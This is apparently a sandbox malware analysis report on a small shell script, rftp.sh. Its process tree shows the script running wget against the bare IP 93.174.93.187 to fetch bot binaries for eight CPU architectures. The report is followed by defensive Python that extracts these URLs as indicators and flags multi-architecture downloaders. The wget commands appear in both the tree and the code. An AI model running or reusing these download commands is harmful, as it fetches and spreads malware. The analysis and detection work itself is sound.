Analysis

  • max time kernel
    0s
  • max time network
    153s
  • platform
    linux_mipsel
  • resource
    debian9-mipsel-en-20211208
  • resource tags

    arch:mipsel
    image:debian9-mipsel-en-20211208
    kernel:4.9.0-13-4kc-malta
    locale:en-us
    os:debian-9-mipsel
    system
  • submitted
    03-10-2022 01:59

General

  • Target

    tmp/rftp.sh

  • Size

    543B

  • MD5

    14dcef3dd4cc163cda3acafdce3e1855

  • SHA1

    2fa79835d19bb0021fa3687b21d05600f2dbef95

  • SHA256

    c20d42369a607ef0dd0853b7cb9e633a5fa874b2403fb8bcd020f167a5466e67

  • SHA512

    dc845248446f25e6558d295191aad2a5a2c433b3dc711e12812a258b08381fa167f3c45fe125385f5068acab3ae751bf67ab96d8664c008a02083ab5fde90e42

Score
5/10

Malware Config

Signatures

  • Writes file to tmp directory (1 IoC)

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/tmp/rftp.sh
    /tmp/tmp/rftp.sh
    1⤵
    • Writes file to tmp directory
    PID:325
    • /usr/bin/wget
      wget http://93.174.93.187/blumips
      2⤵
      PID:326
    • /usr/bin/wget
      wget http://93.174.93.187/blumips64
      2⤵
      PID:331
    • /usr/bin/wget
      wget http://93.174.93.187/blumipsel
      2⤵
      PID:332
    • /usr/bin/wget
      wget http://93.174.93.187/bluarm
      2⤵
      PID:333
    • /usr/bin/wget
      wget http://93.174.93.187/blush
      2⤵
      PID:334
    • /usr/bin/wget
      wget http://93.174.93.187/bluppc
      2⤵
      PID:335
    • /usr/bin/wget
      wget http://93.174.93.187/blui686
      2⤵
      PID:336
    • /usr/bin/wget
      wget http://93.174.93.187/blux86
      2⤵
      PID:337
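The process tree above shows the classic IoT downloader pattern: one shell script spawning a wget per CPU architecture, all pointing at the same bare-IP host. As an added example (not part of the sandbox report or its tooling), the following Python parses such a tree, pulls the download URLs out as IOCs and flags the multi-architecture fetch from a single parent. The tab-separated process listing is constructed from the report's Processes section; the function names, the downloader list and the architecture-suffix heuristic are this example's own assumptions.

```python
"""Extract download IOCs from a sandbox process tree and flag the
multi-architecture downloader pattern.

Added example, not code from the sandbox report.  The process listing
below is constructed from the report's Processes section; the layout
(pid, parent pid, command line, tab-separated), the helper names and
the architecture-suffix list are assumptions made for this example.
"""
import re
from collections import defaultdict
from urllib.parse import urlparse

# Constructed sample: PIDs and command lines from the report, flattened
# to "pid<TAB>ppid<TAB>cmdline".  The parent of the script is given as 0.
SAMPLE_PROCESSES = """\
325\t0\t/tmp/tmp/rftp.sh
326\t325\twget http://93.174.93.187/blumips
331\t325\twget http://93.174.93.187/blumips64
332\t325\twget http://93.174.93.187/blumipsel
333\t325\twget http://93.174.93.187/bluarm
334\t325\twget http://93.174.93.187/blush
335\t325\twget http://93.174.93.187/bluppc
336\t325\twget http://93.174.93.187/blui686
337\t325\twget http://93.174.93.187/blux86
"""

# Fetchers that IoT droppers typically call out to (example's own list).
DOWNLOADERS = {"wget", "curl", "tftp", "ftpget"}

# Architecture suffixes used by multi-arch bot build sets.  Heuristic:
# "sh" also matches ordinary shell scripts, so treat a lone hit as weak.
ARCH_SUFFIXES = ("mips64", "mipsel", "mips", "arm", "ppc", "i686", "x86", "sh")

URL_RE = re.compile(r"https?://[^\s'\"]+")
IP_LITERAL_RE = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")


def parse_process_tree(text):
    """Return a list of (pid, ppid, cmdline) from the tab-separated listing."""
    procs = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, ppid, cmd = line.split("\t", 2)
        procs.append((int(pid), int(ppid), cmd.strip()))
    return procs


def is_downloader(cmdline):
    """True when the command's executable basename is a known fetcher."""
    exe = cmdline.split()[0].rsplit("/", 1)[-1]
    return exe in DOWNLOADERS


def extract_urls(procs):
    """All URLs found in downloader command lines, in process order."""
    urls = []
    for _pid, _ppid, cmd in procs:
        if is_downloader(cmd):
            urls.extend(URL_RE.findall(cmd))
    return urls


def arch_of(filename):
    """Guess the target architecture from a payload name; longest suffix wins."""
    for suffix in sorted(ARCH_SUFFIXES, key=len, reverse=True):
        if filename.endswith(suffix):
            return suffix
    return None


def multi_arch_downloader(procs, min_archs=3):
    """Group fetched payloads by (parent pid, host) and keep groups where one
    parent pulled binaries for at least `min_archs` architectures from the
    same host.  Returns {(ppid, host): [sorted arch names]}."""
    by_parent_host = defaultdict(set)
    for _pid, ppid, cmd in procs:
        if not is_downloader(cmd):
            continue
        for url in URL_RE.findall(cmd):
            parsed = urlparse(url)
            arch = arch_of(parsed.path.rsplit("/", 1)[-1])
            if arch and parsed.hostname:
                by_parent_host[(ppid, parsed.hostname)].add(arch)
    return {key: sorted(archs) for key, archs in by_parent_host.items()
            if len(archs) >= min_archs}


def bare_ip_hosts(procs):
    """Hosts contacted by IP literal rather than hostname (a common C2/staging trait)."""
    hosts = {urlparse(u).hostname for u in extract_urls(procs)}
    return sorted(h for h in hosts if h and IP_LITERAL_RE.match(h))


if __name__ == "__main__":
    procs = parse_process_tree(SAMPLE_PROCESSES)
    for url in extract_urls(procs):
        print("IOC url:", url)
    print("bare-IP hosts:", bare_ip_hosts(procs))
    for (ppid, host), archs in multi_arch_downloader(procs).items():
        print(f"multi-arch downloader: pid {ppid} fetched {len(archs)} archs from {host}: {archs}")
```

The `min_archs` threshold is what keeps a single `wget install.sh` from tripping the rule; the `sh` suffix is kept in the list because IoT build sets really do ship SuperH binaries, but on its own it is not evidence.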

Network

MITRE ATT&CK Matrix
